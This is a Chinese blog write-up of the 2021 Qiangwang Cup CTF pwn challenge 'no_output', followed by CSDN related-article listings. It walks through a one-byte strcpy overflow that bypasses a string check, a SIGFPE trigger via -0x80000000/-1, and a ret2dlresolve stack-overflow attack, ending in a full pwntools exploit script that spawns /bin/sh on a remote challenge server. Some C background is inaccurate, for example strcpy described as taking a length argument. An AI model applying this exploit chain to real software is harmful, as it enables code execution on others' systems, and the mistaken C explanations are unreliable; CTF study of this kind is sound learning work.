PWN题[强网先锋]no_output

最新推荐文章于 2022-11-09 21:49:53 发布
最新推荐文章于 2022-11-09 21:49:53 发布
阅读量484 收藏 3
点赞数
分类专栏: 2021年第五届强网杯 文章标签: c语言 c++ c#
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/am_03/article/details/120029512
版权
博客分析了一段C代码,其中涉及strcpy函数可能导致的单字节溢出,以及如何利用这个漏洞绕过字符串比较并触发信号处理。通过构造特定输入,可以改变fd值,使得程序从标准输入读取内容,然后利用SIGFPE浮点异常触发信号,最终实现栈溢出攻击。解决方案是构造特定输入,触发浮点异常SIGFPE,以执行后续的栈溢出利用。
摘要由CSDN通过智能技术生成

知识点

strcpy(dest, src)
strcpy 函数用于将指定长度的字符串复制到字符数组里
语法形式为:char *strcpy(char *dest, const char *src, int n),
表示把src所指向的字符串里以src地址开始的前n个字节复制到dest所指的数组里,并返回被复制后的dest。
strcpy:strcpy只用于字符串复制,并且它不仅复制字符串内容之外,还会复制字符串的结束符
例:strcpy(a,b) b为源字符串,a为复制b的字符串

read(unk_804C080, src, 0x10u):
unk_804C080的值被赋值为real_flag.txt里的内容
因为
result = open(“real_flag.txt”, 1);
unk_804C080 = result;

类型sighandler_t,表示指向返回值为void型(参数为int型)的函数(的)指针。它用来声明一个或多个函数指针。
sighandler_t sig1, sig2; 这个声明等价于下面的写法:
void (*sig1)(int), (*sig2)(int);

if ( v1 )
{
signal(8, (__sighandler_t)sub_8049236);
v2[1] = v2[0] / (int)v1;
result = signal(8, 0);
}

C语言里的信号signal():
信号是程序执行过程里出现的异常情况。它可能是由程序里的错误造成的,例如引用内存里的一个非法地址;或者是由程序数据里的错误造成的,例如浮点数被0除;或者是由外部事件引发的,例如用户按了Ctrl+Break键。
signal()的原型为:
#include <signal.h>
void(*signal(int hum,void(*func)(int)))(int);
这恐怕是你在C标准函数库里能见到的最复杂的说明了。如果你先定义一个typedef,理解起来就容易一些了。下面给出的sigHandler_t类型是指向一个程序的指针,该函数有一个int类型的参数,并且返回一个void类型:
typedef void(*sigHandler_t)(int);
sigHandler_t signal(int num , sigHandler_t func);

解题流程

首先先查看保护机制
在终端输入checksec ./test
在这里插入图片描述
IDA32位打开:
伪码:
main:
在这里插入图片描述
点击sub_8049424():
在这里插入图片描述
0x30=48
0x20=32
0x10=16

下面查看main的子程序:

(1)
在这里插入图片描述
result = open(“real_flag.txt”, 1); 对real_flag.txt文件只读
result被赋值为从real_flag.txt文件的内容

(2)
sub_80493EC(src);
点开sub_80493EC():
在这里插入图片描述
(3)
sub_8049385(src, off_804C034)
src为由read(unk_804C080, src, 0x10u)获取到的flag内容
因为read(unk_804C080, src, 0x10u)将unk_804C080值读取0x10字节到src里
点开sub_8049385()
在这里插入图片描述
(3)
if ( !result )
result = sub_8049269();
点开sub_8049269()
在这里插入图片描述

漏洞分析

在这里插入图片描述
在这里,标准输入会跟打开的文件里面的字符串进行比较,比较成功才会进入下一步
在这里插入图片描述
在这里插入图片描述
但是我们发现上面用了一个strcpy函数,strcpy存在单字节的溢出,这个函数会用’\x00’结尾,我们可以在上面让dest的后面一个字节为’\x00’,以覆盖fd,改为0后可以直接从stdin读入内容,从而通过strcmp的检测。
在这里插入图片描述
绕开比较进入函数之后是一个signal,必须触发这个signal 8号信号才能进入最后的函数。

signal8是浮点例外。在发生致命的算术运算错误时发出. 不仅包括浮点运算错误, 还包括溢出及除数为0等其它所有的算术的错误。

解决方案

不能除0,就构造溢出。

需要触发算数异常SIGFPE,可以通过-0x80000000/-1触发,触发后可以直接执行一个栈溢出;由于程序里没有输出函数,无法leak函数,所以使用ret2dlresolve方法直接getshell
在这里插入图片描述
exp

from pwn import *
from roputils import *
import time

rop = ROP('./test')
#p = process('./test')
p = remote("39.105.138.97",1234)
context.log_level='debug'

p.send(p32(0))
sleep(1)
p.send("a"*32)
sleep(1)
p.send('hello_boy')
sleep(1)
p.send(str(int(-2147483648)))
sleep(1)
p.send(str(int(-1)))
sleep(1)

offset = 77
bss_base = rop.section('.bss')
buf = rop.fill(offset)
buf += rop.call('read', 0, bss_base, 100)
buf += rop.dl_resolve_call(bss_base + 20, bss_base)
p.send(buf)

buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
buf += rop.dl_resolve_data(bss_base + 20, 'system')
buf += rop.fill(100, buf)
p.send(buf)

p.interactive()

flag值为:qwb{n0_1nput_1s_great!!!}

彬彬有礼am_03
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN-无libc泄露
zszcr的博客
03-22 3715
pwn的无libc泄露用到的pwntools的DynELF模块实现条件是:有指向libc空间的 能泄露libc空间信息的函数 (write和puts函数)能重复触发漏洞DynELF模块的基本框架:p=process('./xxx')def leak(address):    payload='xxx'+address+'xxx'  #address就是你要泄露的地址 ,payload是你控制程序...
BugkuCTF-PWNpwn3-read_note超详细讲解
am_03的博客
08-30 2662
知识点 puts()的特性 , puts()会一直输出某地址的数据,直到遇到 \x00 Canary最低位为\x00(截断符) \x 和 0x 的区别: 区别不大,都是把数按16进制输出。 1、0x 表示整型数值 (十六进制) char c = 0x42; 表示的是一个数值(字母B的ASCII码66),可以认为等价于: int c = 0x42; 2、\x42用于字符表达,或者字符串表达 char c = ‘\x42’; 亦等价于: char c = 0x42; char* s = “\x41\x42
2021 强网杯 [强网先锋] no_output
yongbaoii的博客
06-23 555
保护 你的输入会跟打开的文件里面的字符串进行比较,比较成功才会进入下一步。 但是我们发现上面用了一个strcpy函数,这个函数会用’\x00’结尾,我们可以再上面让dest的后面一个字节为’\x00’,那个地方刚好是文件符的位置,就可以绕开比较。 绕开比较进入函数之后是一个signal,必须触发这个signal8才能进入最后的函数。 signal8是浮点例外。在发生致命的算术运算错误时发出. 不仅包括浮点运算错误, 还包括溢出及除数为0等其它所有的算术的错误。 不能除0,就构造溢出。 用-214748
强网杯 2021 no_output
九层台
06-16 3205
强网杯 2021 no_output 没有输出,包含栈溢出。进行两次校验,前两次输入直接用angr模板获取。但是angr不能直接探索到触发信号之后(可能是咱不懂) import angr import sys import binascii def main(argv): path_to_binary = "./test" # :string project = angr.Project(path_to_binary)#要分析的二进制文件 # 告诉ange从哪里开始执行entr
pwn】2022 羊城杯 fakeNoOutput
woodwhale的博客
09-05 428
2022 羊城杯 fakeNoOutput
gdb调试c语言在poll函数卡住,GDB调试没有,但是直接运行或者远程PWN都卡住,没有输出?...
weixin_42300956的博客
05-20 374
一个十分简单的pwn热手,用GDB attach调试可以正常get shell,但是直接运行或者远程连接都不行,有人遇到过类似的情况吗?漏洞点080484eb :80484eb: 55 push %ebp80484ec: 89 e5 mov %esp,%ebp80484ee: 83 ec...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲 仿真_脉冲发生器PWM
09-24
PWM,即脉宽调制(Pulse Width Modulation),是一种广泛应用的数字控制技术,主要用于调节电子设备的功率或模拟信号。在单片机系统中,PWM脉冲发生器是核心部件,它通过改变脉冲宽度来调整输出信号的平均电压,从而...
PWM.zip_51pwm波控制LED_51控制pwn_PWN波_pwm中断_pwn呼吸灯设计
09-14
PWM,即脉宽调制(Pulse Width Modulation),是一种常用的技术,用于通过改变信号的高电平时间比例来调节输出功率或模拟信号。在51单片机中,PWM常用于控制LED亮度、电机速度以及其他模拟信号的输出。...
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问
stm32 tim8 pwn输出
chuncanL的博客
03-30 3336
在stm32中 使用定时器8 输出pwn要调用下面这句话 否则不输出TIM_CtrlPWMOutputs(TIM8, ENABLE); 一句话坑我一晚上
2019第三届强网杯-强网先锋-ADwp
or1d1的博客
05-27 5128
周末参加了一下强网杯,emmm这些目不是我等弟弟所能解答的。 鲲or鳗orGame目wphttps://blog.csdn.net/or1d1/article/details/90599659 其他大佬的wp https://skysec.top/2019/05/25/2019-%E5%BC%BA%E7%BD%91%E6%9D%AFonline-Web-Writeup/#uploa...
linux函数没有返回值导致溢出,pwn的艺术浅谈(一):linux栈溢出
weixin_30621429的博客
05-03 422
这个系列主要介绍linux pwn的基础知识,包括堆栈漏洞的一些利用方法。这篇文章是这个系列的第一篇文章。这里我们以jarvisoj上的一些pwn为例来对linux下栈溢出利用和栈的基本知识做一个简单的介绍。目地址:https://www.jarvisoj.com/challenges。0. Level0,栈的基本结构及nx绕过首先查看一下目的保护措施(如下图所示),可以看到是一个只开启了N...
强网杯部分pwnwriteup
Sakura给爷pwn全场
10-01 567
强网杯部分pwnwriteup: https://www.anquanke.com/post/id/215274#h3-2
祥云杯2022 pwn - unexploitable
z1r0的博客
11-01 416
没有输出函数,所以思路很明确,利用局部覆盖覆盖ret成7d0这个函数,然后使用爆破的方法,将libc_start_main的低地址改掉,改成one_gadget。一个栈溢出就没有其它的了。
pwnnum37---栈溢出 + strcpy函数溢出
tbsqigongzi的博客
04-29 824
BUUCTF-PWN-ciscn_2019_ne_5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 程序运行后让我们输入密码, ida一下看一下主函数 看来要想进行下面的操作,必须输入password:administrator if ( strcmp(s1, “administr
祥云杯2022 pwn - protocol
最新发布
z1r0的博客
11-09 1208
笔者这里的rop就是read(0, xxxxx, 0x50),execve(“xxxx”, 0, 0)来getshell。在拷贝username和password的时候发生了栈溢出漏洞,因为username和password可控。直接放rop的话是不行的,因为\x00在strcpy中会被截断,所以倒着写rop。一开始没看出来是Protobuf,搜了一圈里面的东西才知道是Protobuf。首先需要得到ctf.proto这个东西然后按着下面的顺序就行。这个时候就可以得到一个ctf.proto的文件。
pwn基础知识笔记
月阴荒的博客
02-20 2349
算是总的开一篇文章,把学到的知识总结一下,之后会重复写到各个文章里面 checksec指令, 用来查询pwn目的壳和保护,并且能够看到程序的信息 1.Canary保护 参考链接:https://blog.csdn.net/weixin_44540286/article/details/101629735?utm_source=distribute.pc_relevant.none-task Ca...
pwn bof 两
think_ycx的专栏
04-03 2013
pwn1thoughtcarter学长给的bof目,目比较奇葩= =。IDA能分析个大概:int sub_8048582() { alarm(0x3Cu); setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); dword_804A160 = sub_804856D; printf("C'mon pwn me :
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值